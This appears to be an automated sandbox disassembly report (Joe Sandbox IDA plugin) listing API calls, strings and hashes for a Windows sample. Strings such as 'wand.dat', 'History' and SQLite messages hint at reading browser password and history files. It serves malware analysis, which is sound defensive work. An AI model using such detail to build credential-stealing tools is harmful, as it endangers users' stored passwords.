                          Similarity
                          • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                          • String ID: <%s>%s</%s>$</item>$<item>
                          • API String ID: 1775345501-2769808009
                          APIs
                          • wcscpy.MSVCRT ref: 0041477F
                          • wcscpy.MSVCRT ref: 0041479A
                          • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000), ref: 004147C1
                          • CloseHandle.KERNEL32(00000000), ref: 004147C8
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscpy$CloseCreateFileHandle
                          • String ID: General
                          • API String ID: 999786162-26480598
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ErrorLastMessage_snwprintf
                          • String ID: Error$Error %d: %s
                          • API String ID: 313946961-1552265934
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID:
                          • String ID: foreign key constraint failed$new$oid$old
                          • API String ID: 0-1953309616
                          Strings
                          • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                          • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                          • unknown column "%s" in foreign key definition, xrefs: 00431858
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                          • API String ID: 3510742995-272990098
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: gj
                          • API String ID: 1297977491-4203073231
                          APIs
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                            • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E961
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E974
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E987
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E99A
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040E9D3
                            • Part of subcall function 0040AA04: ??3@YAXPAX@Z.MSVCRT ref: 0040AA0B
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          APIs
                          • AreFileApisANSI.KERNEL32 ref: 00417497
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                          • malloc.MSVCRT ref: 004174BD
                          • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                          • ??3@YAXPAX@Z.MSVCRT ref: 004174E4
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$??3@ApisFilemalloc
                          • String ID:
                          • API String ID: 2903831945-0
                          APIs
                          • GetParent.USER32(?), ref: 0040D453
                          • GetWindowRect.USER32(?,?), ref: 0040D460
                          • GetClientRect.USER32(00000000,?), ref: 0040D46B
                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Window$Rect$ClientParentPoints
                          • String ID:
                          • API String ID: 4247780290-0
                          APIs
                            • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000), ref: 004096D5
                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                          • ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                          • memset.MSVCRT ref: 004450CD
                            • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                          • ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                            • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F63
                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F75
                            • Part of subcall function 00444E84: memcpy.MSVCRT ref: 00444F9D
                          • CloseHandle.KERNEL32(00000000), ref: 004450F7
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                          • String ID:
                          • API String ID: 1471605966-0
                          APIs
                          • wcscpy.MSVCRT ref: 0044475F
                          • wcscat.MSVCRT ref: 0044476E
                          • wcscat.MSVCRT ref: 0044477F
                          • wcscat.MSVCRT ref: 0044478E
                            • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                            • Part of subcall function 004099C6: memcpy.MSVCRT ref: 004099E3
                            • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?), ref: 00409AA5
                            • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                          • String ID: \StringFileInfo\
                          • API String ID: 102104167-2245444037
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$??3@
                          • String ID: g4@
                          • API String ID: 3314356048-2133833424
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _memicmpwcslen
                          • String ID: @@@@$History
                          • API String ID: 1872909662-685208920
                          APIs
                          • memset.MSVCRT ref: 004100FB
                          • memset.MSVCRT ref: 00410112
                            • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                            • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                          • _snwprintf.MSVCRT ref: 00410141
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$_snwprintf_wcslwrwcscpy
                          • String ID: </%s>
                          • API String ID: 3400436232-259020660
                          • Opcode ID: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                          • Instruction ID: d6b380c41b5e3e458bf6abeca455f552dea24a705517b0a2e3702c553642f250
                          • Opcode Fuzzy Hash: dc58dcbe4721772b8e09841cb0bf69786816bd9c9006e9a76d773a39c29a63fb
                          • Instruction Fuzzy Hash: 9B01DBF3D0012977D730A755CC46FEA76ACEF45304F0000B6BB08B3186DB78DA458A99
                          APIs
                          • memset.MSVCRT ref: 0040D58D
                          • SetWindowTextW.USER32(?,?), ref: 0040D5BD
                          • EnumChildWindows.USER32(?,Function_0000D4F5,00000000), ref: 0040D5CD
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ChildEnumTextWindowWindowsmemset
                          • String ID: caption
                          • API String ID: 1523050162-4135340389
                          • Opcode ID: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                          • Instruction ID: dcfab03f3ae0740f4c11e1fd8af26e22289cdce227bdcda27870e2dbaf68b2c3
                          • Opcode Fuzzy Hash: c23acb22e5a8502154e4be65b33a4ced3ce6ae2c099f2d24681839129fd3d8a7
                          • Instruction Fuzzy Hash: 50F08131D0031876FB206B95CC4EB8A3268AB04744F000076BE04B61D2DBB8EA44C69D
                          APIs
                            • Part of subcall function 00409BFD: memset.MSVCRT ref: 00409C07
                            • Part of subcall function 00409BFD: wcscpy.MSVCRT ref: 00409C47
                          • CreateFontIndirectW.GDI32(?), ref: 00401156
                          • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                          • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                          • String ID: MS Sans Serif
                          • API String ID: 210187428-168460110
                          • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                          • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                          • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                          • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClassName_wcsicmpmemset
                          • String ID: edit
                          • API String ID: 2747424523-2167791130
                          • Opcode ID: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                          • Instruction ID: aa36152fd255268de381ae2120198bffa1fffac517830ea88c39a2b7b5867ff0
                          • Opcode Fuzzy Hash: 966ba6659df31be0b994ff47204b898d343df69b3f9d85cbf29a1f53eef5b26a
                          • Instruction Fuzzy Hash: 86E0D872D8031E6AFB10EBA0DC4AFA977BCFB01708F0001B6B915E10C2EBB496494A45
                          APIs
                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                          • GetProcAddress.KERNEL32(00000000,shlwapi.dll,750A375A,?,00405751,00000000), ref: 00414E2B
                          • FreeLibrary.KERNEL32(00000000,?,00405751,00000000), ref: 00414E43
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                          • String ID: SHAutoComplete$shlwapi.dll
                          • API String ID: 3150196962-1506664499
                          • Opcode ID: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                          • Instruction ID: 56be8aed7d941f739c6f69dc747e21d8edf2639efa9d7e462eda1ee05908af23
                          • Opcode Fuzzy Hash: d2abe1e6ce67af05a23a9289f1a003983cf5919859a34de4ac3658ffea157a86
                          • Instruction Fuzzy Hash: C1D0C2353002315BD6616B27AC04AAF2A99EFC13A1B054035F928D2210DBA84996827D
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy$memcmp
                          • String ID:
                          • API String ID: 3384217055-0
                          • Opcode ID: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction ID: f5df6941464580ef2fdae31f27b7f31021858bb2d0e37ec30fcb1df3a02010a9
                          • Opcode Fuzzy Hash: b300709f8a896244993036e355843064c877904d0b203d23fc10c8ecfa49f6ec
                          • Instruction Fuzzy Hash: 8821B2B2E10249ABDB14EA91DC46EDF73FC9B44704F01442AF512D7181EB28E644C725
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                          • Instruction ID: abb90bdd0bd5c960a46cc99acd1c91865272cbbdb433919b32c204757dd19146
                          • Opcode Fuzzy Hash: 97945d52b79a003f2428fc236831fd74eb0a020fff419a73dba27ff1a1f4f0ec
                          • Instruction Fuzzy Hash: 0201FCB5740B007BF235AB35CC03F9A73A8AF52724F004A1EF153966C2DBF8A554819D
                          APIs
                            • Part of subcall function 004019D8: GetMenu.USER32(?), ref: 004019F6
                            • Part of subcall function 004019D8: GetSubMenu.USER32(00000000), ref: 004019FD
                            • Part of subcall function 004019D8: EnableMenuItem.USER32(?,?,00000000), ref: 00401A15
                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000412,?,00000000), ref: 00401A36
                            • Part of subcall function 00401A1F: SendMessageW.USER32(?,00000411,?,?), ref: 00401A5A
                          • GetMenu.USER32(?), ref: 00410F8D
                          • GetSubMenu.USER32(00000000), ref: 00410F9A
                          • GetSubMenu.USER32(00000000), ref: 00410F9D
                          • CheckMenuRadioItem.USER32(00000000,0000B284,0000B287,?,00000000), ref: 00410FA9
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Menu$ItemMessageSend$CheckEnableRadio
                          • String ID:
                          • API String ID: 1889144086-0
                          • Opcode ID: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                          • Instruction ID: be5000c07a60ff25a23af51018491178d5f127676f18bd69b4cc56e9e4830f27
                          • Opcode Fuzzy Hash: 48c6688bed2e9d799b6f1c845f6ed1ed25569c1cc633281ca29a779208fa5c2f
                          • Instruction Fuzzy Hash: D5517171B40704BFEB20AB66CD4AF9FBAB9EB44704F00046EB249B72E2C6756D50DB54
                          APIs
                          • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 004180B8
                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 004180E3
                          • GetLastError.KERNEL32 ref: 0041810A
                          • CloseHandle.KERNEL32(00000000), ref: 00418120
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$CloseCreateErrorHandleLastMappingView
                          • String ID:
                          • API String ID: 1661045500-0
                          • Opcode ID: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                          • Instruction ID: 5cb71d9443798353a032a6b226e7c46d85178154149a60e532078a3cdb21b7c8
                          • Opcode Fuzzy Hash: eb48187120a9c185743a1b3c178acae082383636f0c481d7e40b999055df197a
                          • Instruction Fuzzy Hash: 64518A71204706DFDB24CF25C984AA7BBE5FF88344F10492EF84287691EB74E895CB99
                          APIs
                            • Part of subcall function 00415A91: memset.MSVCRT ref: 00415AAB
                          • memcpy.MSVCRT ref: 0042EC7A
                          Strings
                          • sqlite_altertab_%s, xrefs: 0042EC4C
                          • Cannot add a column to a view, xrefs: 0042EBE8
                          • virtual tables may not be altered, xrefs: 0042EBD2
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpymemset
                          • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                          • API String ID: 1297977491-2063813899
                          • Opcode ID: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                          • Instruction ID: f910cd7a27c7e389b2617bf4251edf561ae6288f62f29054cc1fb9bea0934792
                          • Opcode Fuzzy Hash: 474643fef30daba4970a7dc8f748fcc45b15c3e498b07267a37eb72da69de8bb
                          • Instruction Fuzzy Hash: 1E418E75A00615EFCB04DF5AD881A99BBF0FF48314F65816BE808DB352D778E950CB88
                          APIs
                          • memset.MSVCRT ref: 0040560C
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                            • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                            • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                            • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                            • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                            • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT ref: 0040A4F3
                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.*$dat$wand.dat
                          • API String ID: 2618321458-1828844352
                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                          APIs
                            • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                            • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                          • wcslen.MSVCRT ref: 00410C74
                          • _wtoi.MSVCRT ref: 00410C80
                          • _wcsicmp.MSVCRT ref: 00410CCE
                          • _wcsicmp.MSVCRT ref: 00410CDF
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _wcsicmp$??2@??3@_wtoiwcslen
                          • String ID:
                          • API String ID: 1549203181-0
                          • Opcode ID: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                          • Instruction ID: d767fa7272777d82bc727b9b5621bf7cb5fcf48a3d465f11467ce1d5a1151d11
                          • Opcode Fuzzy Hash: a5a55a776a9d7000c7a90f9dc0003ee3df1153e447b70ecb3cda70254c63b6c3
                          • Instruction Fuzzy Hash: 5E4190359006089FCF21DFA9D480AD9BBB4EF48318F1105AAEC05DB316D6B4EAC08B99
                          APIs
                          • memset.MSVCRT ref: 00412057
                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                          • GetKeyState.USER32(00000010), ref: 0041210D
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                          • String ID:
                          • API String ID: 3550944819-0
                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                          APIs
                          • wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                          • memcpy.MSVCRT ref: 0040A94F
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 3023356884-0
                          • Opcode ID: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                          • Opcode Fuzzy Hash: e8e6c2fed7f9440c8640dc4717368e77cb96f6303dd1ec86a793a42355efe2a9
                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                          APIs
                          • wcslen.MSVCRT ref: 0040B1DE
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B201
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B224
                          • memcpy.MSVCRT ref: 0040B248
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 3023356884-0
                          • Opcode ID: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                          • Opcode Fuzzy Hash: 6421ea3f553dae7d25363b5bd64276aec0fbe05fa0d8b4b2605bf4838246495e
                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memcpy
                          • String ID: @
                          • API String ID: 3510742995-2766056989
                          • Opcode ID: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                          • Instruction ID: b25eae0e74258469ce0af521155fdf6a80f479b4e9ffe9ec94392e3587c9c40c
                          • Opcode Fuzzy Hash: 871df5fef43ba47fad24df649b94f0d233f9868d8bda670e26c25dba733484ff
                          • Instruction Fuzzy Hash: 65115EF2A003057FDB349E15D980C9A77A8EF50394B00062FF90AD6151E7B8DEA5C7D9
                          APIs
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@??3@memcpymemset
                          • String ID:
                          • API String ID: 1865533344-0
                          • Opcode ID: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                          • Instruction ID: b60eca7fe842e91d7951f76ed0837c2ba419520120b0ca9395dcc9976308fc09
                          • Opcode Fuzzy Hash: 63ad74f41b12567b58218fea097aeaefd91ee3ffeae00ec4d641ec9fdbd265cd
                          • Instruction Fuzzy Hash: C7118C71204701AFD328DF2DC881A27F7E9EF99300B21892EE49AC7385DA35E811CB55
                          APIs
                          • strlen.MSVCRT ref: 0040B0D8
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B0FB
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT ref: 00409A28
                            • Part of subcall function 004099F4: ??3@YAXPAX@Z.MSVCRT ref: 00409A31
                          • ??3@YAXPAX@Z.MSVCRT ref: 0040B12C
                          • memcpy.MSVCRT ref: 0040B159
                          Memory Dump Source
                          • Source File: 00000015.00000002.392575914.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_21_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@$memcpy$mallocstrlen
                          • String ID:
                          • API String ID: 1171893557-0
                          • Opcode ID: 1049280fa2475c497c1b628b605c6dc2082e028c9e0fefa85919baabf6481477
